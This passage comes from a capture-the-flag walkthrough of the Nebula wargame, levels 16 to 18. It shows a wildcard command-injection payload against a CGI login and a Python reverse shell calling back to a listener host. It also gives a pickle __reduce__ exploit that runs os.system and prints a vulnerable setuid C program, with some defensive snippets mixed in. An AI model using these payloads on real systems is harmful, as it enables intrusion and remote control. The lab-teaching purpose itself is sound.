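for candidate in ("$(/tmp/flag.sh)", "$(/*/flag.sh)", "admin; cat /etc/passwd"):
    print(repr(candidate), "->", repr(sanitize_username(candidate)))
```

<p>Punctuation such as <code>$</code>, <code>(</code>, <code>/</code> and <code>*</code> passes through unchanged, so command substitution and wildcards remain available to the payload.</p>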
<p>So our payload will be uppercase and without spaces. This means we cannot simply place a shell script in
<code>/tmp</code> and reference it by its path, because paths are case sensitive and <code>/tmp</code> would turn into <code>/TMP</code>.</p>
<p>And we cannot alter environment variables in the <code>/home/flag16</code> directory, nor can we write in the document
root (also flag16 home dir). So how can we exploit this at all?</p>
<p>After some minutes of pure confusion, I tried to craft paths with bash wildcards. So I tried to execute a
program in <code>/tmp</code> without using any lowercase characters.</p>
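<p>The wildcard idea can be tried out safely with Python's <code>glob</code> module, which follows similar (though not identical) rules to shell globbing. In this sketch a temporary directory stands in for <code>/</code>; the directory layout and the helper name <code>resolve_uppercase_payload</code> are made up for illustration.</p>

```python
import glob
import os
import tempfile


def resolve_uppercase_payload(root, script_name):
    """Expand <root>/*/<script_name>, like the shell expands /*/SCRIPT."""
    return glob.glob(os.path.join(root, "*", script_name))


with tempfile.TemporaryDirectory() as root:
    # A lowercase directory, which the payload cannot spell out itself.
    os.mkdir(os.path.join(root, "tmp"))
    with open(os.path.join(root, "tmp", "SLEEPY.SH"), "w") as handle:
        handle.write("#!/bin/bash\nsleep 5\n")

    # The pattern contains no lowercase letters, yet it resolves to tmp/.
    matches = resolve_uppercase_payload(root, "SLEEPY.SH")
    print(matches)
```

<p>The <code>*</code> stands in for the lowercase directory name, so only the script name itself has to be uppercase.</p>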
<p>First I created a simple test script:</p>
<div class="highlight"><pre><span></span><code>level16@nebula:~$ cat /tmp/SLEEPY.SH
<span class="c1">#!/bin/bash</span>
sleep <span class="m">5</span>
</code></pre></div>
<p>Then I created a short Python program to request the cgi script:</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/python</span>
<span class="kn">import</span> <span class="nn">urllib2</span>
<span class="kn">from</span> <span class="nn">urllib</span> <span class="kn">import</span> <span class="n">quote</span>
<span class="n">host</span> <span class="o">=</span> <span class="s1">'192.168.56.101:1616'</span>
<span class="n">uri</span> <span class="o">=</span> <span class="s1">'http://</span><span class="si">{}</span><span class="s1">/index.cgi?username=</span><span class="si">{}</span><span class="s1">&password=</span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">quote</span><span class="p">(</span><span class="s1">'$(/*/SLEEPY.sh)'</span><span class="p">,</span> <span class="n">safe</span><span class="o">=</span><span class="s1">''</span><span class="p">),</span> <span class="s1">''</span><span class="p">)</span>
<span class="n">request</span> <span class="o">=</span> <span class="n">urllib2</span><span class="o">.</span><span class="n">urlopen</span><span class="p">(</span><span class="n">uri</span><span class="p">)</span>
<span class="c1"># should take at least 5 seconds if the code is executed</span>
<span class="nb">print</span> <span class="n">request</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
</code></pre></div>
<p>It worked! A payload of the form <code>$(/*/OURCODE.SH)</code> executes our program in the <code>/tmp/</code> directory. Next I created a simple
POC script:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># create POC script </span>
<span class="nb">echo</span> -e <span class="s1">'#!/bin/bash\ngetflag > /tmp/gotflag'</span> > /tmp/FLAG.SH
chmod +x /tmp/FLAG.SH
</code></pre></div>
<p>And requested the url with the payload:</p>
<blockquote>
<p>http://192.168.56.101:1616/index.cgi?username=%24%28%2F%2A%2FFLAG.SH%29&password=</p>
</blockquote>
<p>It worked!</p>
<div class="highlight"><pre><span></span><code>level16@nebula:~$ cat /tmp/gotflag
You have successfully executed getflag on a target account
</code></pre></div>
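<p>The percent-encoded username in the URL above can be reproduced with Python 3's <code>urllib.parse.quote</code>. This is a sketch that reuses the host and port from this write-up; <code>build_url</code> is a made-up helper name.</p>

```python
from urllib.parse import quote

HOST = "192.168.56.101:1616"  # address of the nebula VM used in this post


def build_url(payload, password=""):
    """Percent-encode every reserved character of the payload (safe='')."""
    return "http://{}/index.cgi?username={}&password={}".format(
        HOST, quote(payload, safe=""), quote(password, safe="")
    )


url = build_url("$(/*/FLAG.SH)")
print(url)
```

<p>Passing <code>safe=''</code> matters here: by default <code>quote()</code> leaves <code>/</code> unescaped.</p>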
<p>To get a shell, start netcat on your host computer and create a reverse shell script in the
<code>/tmp</code> directory on the nebula host:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># on host pc</span>
<span class="n">nc</span> <span class="o">-</span><span class="n">l</span> <span class="mf">192.168.56.1</span> <span class="mi">8888</span>
<span class="c1"># on nebula host</span>
<span class="n">level16</span><span class="nd">@nebula</span><span class="p">:</span><span class="o">~</span><span class="err">$</span> <span class="n">cat</span> <span class="o">/</span><span class="n">tmp</span><span class="o">/</span><span class="n">BD</span><span class="o">.</span><span class="n">PY</span>
<span class="c1">#!/usr/bin/python</span>
<span class="kn">import</span> <span class="nn">socket</span><span class="o">,</span><span class="nn">subprocess</span><span class="o">,</span><span class="nn">os</span>
<span class="n">s</span><span class="o">=</span><span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_INET</span><span class="p">,</span><span class="n">socket</span><span class="o">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
<span class="n">s</span><span class="o">.</span><span class="n">connect</span><span class="p">((</span><span class="s2">"192.168.56.1"</span><span class="p">,</span><span class="mi">8888</span><span class="p">))</span>
<span class="n">os</span><span class="o">.</span><span class="n">dup2</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">fileno</span><span class="p">(),</span><span class="mi">0</span><span class="p">)</span>
<span class="n">os</span><span class="o">.</span><span class="n">dup2</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">fileno</span><span class="p">(),</span><span class="mi">1</span><span class="p">)</span>
<span class="n">os</span><span class="o">.</span><span class="n">dup2</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">fileno</span><span class="p">(),</span><span class="mi">2</span><span class="p">)</span>
<span class="n">p</span><span class="o">=</span><span class="n">subprocess</span><span class="o">.</span><span class="n">call</span><span class="p">([</span><span class="s2">"/bin/sh"</span><span class="p">,</span><span class="s2">"-i"</span><span class="p">])</span>
<span class="n">level16</span><span class="nd">@nebula</span><span class="p">:</span><span class="o">~</span><span class="err">$</span> <span class="n">chmod</span> <span class="o">+</span><span class="n">x</span> <span class="o">/</span><span class="n">tmp</span><span class="o">/</span><span class="n">BD</span><span class="o">.</span><span class="n">PY</span>
</code></pre></div>
<p>Then request the URL with the payload:</p>
<blockquote>
<p>http://192.168.56.101:1616/index.cgi?username=%24%28%2F%2A%2FBD.PY%29&password=</p>
</blockquote>
<p>Getting us a shell:</p>
<div class="highlight"><pre><span></span><code>sh-4.2$ id
id
<span class="nv">uid</span><span class="o">=</span><span class="m">983</span><span class="o">(</span>flag16<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span><span class="m">983</span><span class="o">(</span>flag16<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span><span class="m">983</span><span class="o">(</span>flag16<span class="o">)</span>
sh-4.2$ getflag
getflag
You have successfully executed getflag on a target account
</code></pre></div>
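<p>The <code>username</code> parameter in the URL above is percent-encoded. As a small illustration (Python 3, standard library only, not part of the original exploit), decoding it shows the command substitution that ends up being evaluated. The glob <code>/*/BD.PY</code> presumably lets the shell resolve <code>/tmp/BD.PY</code> without spelling out a lowercase directory name:</p>

```python
from urllib.parse import quote, unquote

# Value of the "username" parameter from the request URL above.
encoded = "%24%28%2F%2A%2FBD.PY%29"

# Decode the percent-escapes to see what the server-side shell receives.
decoded = unquote(encoded)
print(decoded)

# Re-encoding with no "safe" characters reproduces the original parameter.
reencoded = quote(decoded, safe="")
print(reencoded == encoded)
```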
<p>Another approach would be to use case modifications in shell expansions:
<a href="http://wiki.bash-hackers.org/syntax/pe#case_modification">case modifications</a></p>
<h2>Level 17 - RCE with pickle</h2>
<p>This level is quite similar to a previous level where we exploited <code>serialize()</code> in PHP.</p>
<p>Pickle is a simple object serialization algorithm that transforms Python objects to strings and vice versa.</p>
<p>But as the docs state, it is insecure when the data comes from untrusted sources. In our case, the vulnerable server
looks like this:</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/python</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">pickle</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">signal</span>
<span class="n">signal</span><span class="o">.</span><span class="n">signal</span><span class="p">(</span><span class="n">signal</span><span class="o">.</span><span class="n">SIGCHLD</span><span class="p">,</span> <span class="n">signal</span><span class="o">.</span><span class="n">SIG_IGN</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">server</span><span class="p">(</span><span class="n">skt</span><span class="p">):</span>
    <span class="n">line</span> <span class="o">=</span> <span class="n">skt</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
    <span class="nb">print</span> <span class="s1">'Got line: "</span><span class="si">{}</span><span class="s1">"'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
    <span class="n">obj</span> <span class="o">=</span> <span class="n">pickle</span><span class="o">.</span><span class="n">loads</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">obj</span><span class="p">:</span>
        <span class="n">clnt</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="s2">"why did you send me "</span> <span class="o">+</span> <span class="n">i</span> <span class="o">+</span> <span class="s2">"?</span><span class="se">\n</span><span class="s2">"</span><span class="p">)</span>
<span class="n">skt</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="o">.</span><span class="n">SOCK_STREAM</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">skt</span><span class="o">.</span><span class="n">bind</span><span class="p">((</span><span class="s1">'0.0.0.0'</span><span class="p">,</span> <span class="mi">10007</span><span class="p">))</span>
<span class="n">skt</span><span class="o">.</span><span class="n">listen</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span>
<span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
    <span class="n">clnt</span><span class="p">,</span> <span class="n">addr</span> <span class="o">=</span> <span class="n">skt</span><span class="o">.</span><span class="n">accept</span><span class="p">()</span>
    <span class="k">if</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">fork</span><span class="p">()</span> <span class="o">==</span> <span class="mi">0</span><span class="p">):</span>
        <span class="n">clnt</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="s2">"Accepted connection from </span><span class="si">%s</span><span class="s2">:</span><span class="si">%d</span><span class="s2">"</span> <span class="o">%</span> <span class="p">(</span><span class="n">addr</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">addr</span><span class="p">[</span><span class="mi">1</span><span class="p">]))</span>
        <span class="n">server</span><span class="p">(</span><span class="n">clnt</span><span class="p">)</span>
        <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
</code></pre></div>
<p>The above program spawns a server and unpickles whatever data the client sends. This is insecure, because
we can craft a pickled string that executes commands.</p>
<p>You can obtain the pickled string by executing the following code:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">pickle</span>
<span class="c1"># Exploit that we want the target to unpickle</span>
<span class="k">class</span> <span class="nc">Exploit</span><span class="p">(</span><span class="nb">object</span><span class="p">):</span>
    <span class="k">def</span> <span class="nf">__reduce__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">return</span> <span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">,</span> <span class="p">(</span><span class="s1">'python /tmp/bd.py'</span><span class="p">,))</span>
<span class="n">shellcode</span> <span class="o">=</span> <span class="n">pickle</span><span class="o">.</span><span class="n">dumps</span><span class="p">(</span><span class="n">Exploit</span><span class="p">())</span>
<span class="nb">print</span> <span class="n">shellcode</span>
</code></pre></div>
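<p>To see why <code>__reduce__</code> is enough, here is a minimal Python 3 sketch with a deliberately harmless callable. The class name <code>Demo</code> and the choice of <code>len</code> are only for illustration: the point is that <code>pickle.loads()</code> calls whatever callable the pickle names, with the arguments it supplies, and returns the result.</p>

```python
import pickle


class Demo(object):
    def __reduce__(self):
        # (callable, args): on load, the unpickler calls callable(*args).
        # A harmless builtin stands in for os.system here.
        return (len, ("harmless",))


payload = pickle.dumps(Demo())

# Loading does not rebuild a Demo instance; it calls len("harmless").
result = pickle.loads(payload)
print(result)
```

<p>Swapping <code>len</code> for <code>os.system</code> is all it takes to turn this into the exploit above.</p>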
<p>Then, as always, create a connect-back shell in <code>/tmp/bd.py</code>, which might look like this (make it executable!):</p>
<div class="highlight"><pre><span></span><code>level17@nebula:/home/flag17$ cat /tmp/bd.py
<span class="c1">#!/usr/bin/python</span>
import socket,subprocess,os
<span class="nv">s</span><span class="o">=</span>socket.socket<span class="o">(</span>socket.AF_INET,socket.SOCK_STREAM<span class="o">)</span>
s.connect<span class="o">((</span><span class="s2">"localhost"</span>, <span class="m">8888</span><span class="o">))</span>
os.dup2<span class="o">(</span>s.fileno<span class="o">()</span>,0<span class="o">)</span>
os.dup2<span class="o">(</span>s.fileno<span class="o">()</span>,1<span class="o">)</span>
os.dup2<span class="o">(</span>s.fileno<span class="o">()</span>,2<span class="o">)</span>
<span class="nv">p</span><span class="o">=</span>subprocess.call<span class="o">([</span><span class="s2">"/bin/sh"</span>,<span class="s2">"-i"</span><span class="o">])</span>
</code></pre></div>
<p>First open one terminal and enter the following command:</p>
<div class="highlight"><pre><span></span><code>level17@nebula:~$ nc -l localhost <span class="m">8888</span>
</code></pre></div>
<p>In the second terminal, we exploit the server by connecting to it and pasting the pickled string:</p>
<div class="highlight"><pre><span></span><code>level17@nebula:/home/flag17$ nc localhost <span class="m">10007</span>
Accepted connection from <span class="m">127</span>.0.0.1:39122cposix
system
p0
<span class="o">(</span>S<span class="s1">'python /tmp/bd.py'</span>
p1
tp2
Rp3
.
</code></pre></div>
<p>And then in the first terminal we have a shell with user <code>flag17</code>. Done!</p>
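<p>The string pasted into <code>nc</code> above can be inspected without running it. The following Python 3 sketch lists its opcodes with <code>pickletools</code> and then feeds it to a restricted unpickler in the style suggested by the Python documentation. <code>NoGlobalsUnpickler</code> and <code>safe_loads</code> are hypothetical names chosen for this example, and refusing every global is just one possible policy, not a complete defence:</p>

```python
import io
import pickle
import pickletools

# Payload bytes as typed into nc in the session above (protocol 0 pickle).
PAYLOAD = b"cposix\nsystem\np0\n(S'python /tmp/bd.py'\np1\ntp2\nRp3\n."

# genops() only parses the byte stream; it never calls anything.
opcodes = [(op.name, arg) for op, arg, _pos in pickletools.genops(PAYLOAD)]
for name, arg in opcodes:
    print(name, arg)


class NoGlobalsUnpickler(pickle.Unpickler):
    """Hypothetical helper: refuses every global (module.name) lookup."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError("global %s.%s is forbidden" % (module, name))


def safe_loads(data):
    """Unpickle data that consists of plain containers and primitives only."""
    return NoGlobalsUnpickler(io.BytesIO(data)).load()


try:
    safe_loads(PAYLOAD)
    rejected = False
except pickle.UnpicklingError:
    rejected = True
print("rejected:", rejected)
```

<p>The <code>GLOBAL</code> opcode names <code>posix.system</code> and <code>REDUCE</code> calls it with the argument tuple, which is exactly the pair returned by <code>__reduce__</code>.</p>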
<h2>Level 18 - Exhausting file descriptors to create circumstances</h2>
<p>In this level, we need to exploit a C program that has the setuid bit set. The program has the following code:</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdlib.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><unistd.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><string.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdio.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><sys/types.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><fcntl.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><getopt.h></span><span class="cp"></span>
<span class="k">struct</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">FILE</span><span class="w"> </span><span class="o">*</span><span class="n">debugfile</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">verbose</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">loggedin</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"> </span><span class="n">globals</span><span class="p">;</span><span class="w"></span>
<span class="cp">#define dprintf(...) if(globals.debugfile) \</span>
<span class="cp"> fprintf(globals.debugfile, __VA_ARGS__)</span>
<span class="cp">#define dvprintf(num, ...) if(globals.debugfile && globals.verbose >= num) \</span>
<span class="cp"> fprintf(globals.debugfile, __VA_ARGS__)</span>
<span class="cp">#define PWFILE "/home/flag18/password"</span>
<span class="kt">void</span><span class="w"> </span><span class="nf">login</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">pw</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">FILE</span><span class="w"> </span><span class="o">*</span><span class="n">fp</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">fp</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fopen</span><span class="p">(</span><span class="n">PWFILE</span><span class="p">,</span><span class="w"> </span><span class="s">"r"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">fp</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">file</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">fgets</span><span class="p">(</span><span class="n">file</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">file</span><span class="p">)</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="n">fp</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">dprintf</span><span class="p">(</span><span class="s">"Unable to read password file %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">PWFILE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">fclose</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">pw</span><span class="p">,</span><span class="w"> </span><span class="n">file</span><span class="p">)</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="k">return</span><span class="p">;</span><span class="w"> </span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">dprintf</span><span class="p">(</span><span class="s">"logged in successfully (with%s password file)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="n">fp</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="s">"out"</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="s">""</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">globals</span><span class="p">.</span><span class="n">loggedin</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="kt">void</span><span class="w"> </span><span class="nf">notsupported</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">what</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">buffer</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">asprintf</span><span class="p">(</span><span class="o">&</span><span class="n">buffer</span><span class="p">,</span><span class="w"> </span><span class="s">"--> [%s] is unsupported at this current time.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">what</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">dprintf</span><span class="p">(</span><span class="n">what</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">buffer</span><span class="p">);</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="kt">void</span><span class="w"> </span><span class="nf">setuser</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">user</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">msg</span><span class="p">[</span><span class="mi">128</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="n">sprintf</span><span class="p">(</span><span class="n">msg</span><span class="p">,</span><span class="w"> </span><span class="s">"unable to set user to '%s' -- not supported.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">user</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">msg</span><span class="p">);</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">argv</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">envp</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">c</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">while</span><span class="p">((</span><span class="n">c</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">getopt</span><span class="p">(</span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="n">argv</span><span class="p">,</span><span class="w"> </span><span class="s">"d:v"</span><span class="p">))</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">-1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">switch</span><span class="p">(</span><span class="n">c</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="sc">'d'</span><span class="o">:</span><span class="w"></span>
<span class="w"> </span><span class="n">globals</span><span class="p">.</span><span class="n">debugfile</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fopen</span><span class="p">(</span><span class="n">optarg</span><span class="p">,</span><span class="w"> </span><span class="s">"w+"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">globals</span><span class="p">.</span><span class="n">debugfile</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="n">err</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="s">"Unable to open %s"</span><span class="p">,</span><span class="w"> </span><span class="n">optarg</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">setvbuf</span><span class="p">(</span><span class="n">globals</span><span class="p">.</span><span class="n">debugfile</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="n">_IONBF</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="sc">'v'</span><span class="o">:</span><span class="w"></span>
<span class="w"> </span><span class="n">globals</span><span class="p">.</span><span class="n">verbose</span><span class="o">++</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">dprintf</span><span class="p">(</span><span class="s">"Starting up. Verbose level = %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">globals</span><span class="p">.</span><span class="n">verbose</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">setresgid</span><span class="p">(</span><span class="n">getegid</span><span class="p">(),</span><span class="w"> </span><span class="n">getegid</span><span class="p">(),</span><span class="w"> </span><span class="n">getegid</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="n">setresuid</span><span class="p">(</span><span class="n">geteuid</span><span class="p">(),</span><span class="w"> </span><span class="n">geteuid</span><span class="p">(),</span><span class="w"> </span><span class="n">geteuid</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">line</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">p</span><span class="p">,</span><span class="w"> </span><span class="o">*</span><span class="n">q</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">q</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fgets</span><span class="p">(</span><span class="n">line</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">line</span><span class="p">)</span><span class="mi">-1</span><span class="p">,</span><span class="w"> </span><span class="n">stdin</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">q</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">p</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">strchr</span><span class="p">(</span><span class="n">line</span><span class="p">,</span><span class="w"> </span><span class="sc">'\n'</span><span class="p">);</span><span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">p</span><span class="p">)</span><span class="w"> </span><span class="o">*</span><span class="n">p</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">p</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">strchr</span><span class="p">(</span><span class="n">line</span><span class="p">,</span><span class="w"> </span><span class="sc">'\r'</span><span class="p">);</span><span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">p</span><span class="p">)</span><span class="w"> </span><span class="o">*</span><span class="n">p</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">dvprintf</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span><span class="w"> </span><span class="s">"got [%s] as input</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">line</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">strncmp</span><span class="p">(</span><span class="n">line</span><span class="p">,</span><span class="w"> </span><span class="s">"login"</span><span class="p">,</span><span class="w"> </span><span class="mi">5</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">dvprintf</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span><span class="w"> </span><span class="s">"attempting to login</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">login</span><span class="p">(</span><span class="n">line</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">6</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">strncmp</span><span class="p">(</span><span class="n">line</span><span class="p">,</span><span class="w"> </span><span class="s">"logout"</span><span class="p">,</span><span class="w"> </span><span class="mi">6</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
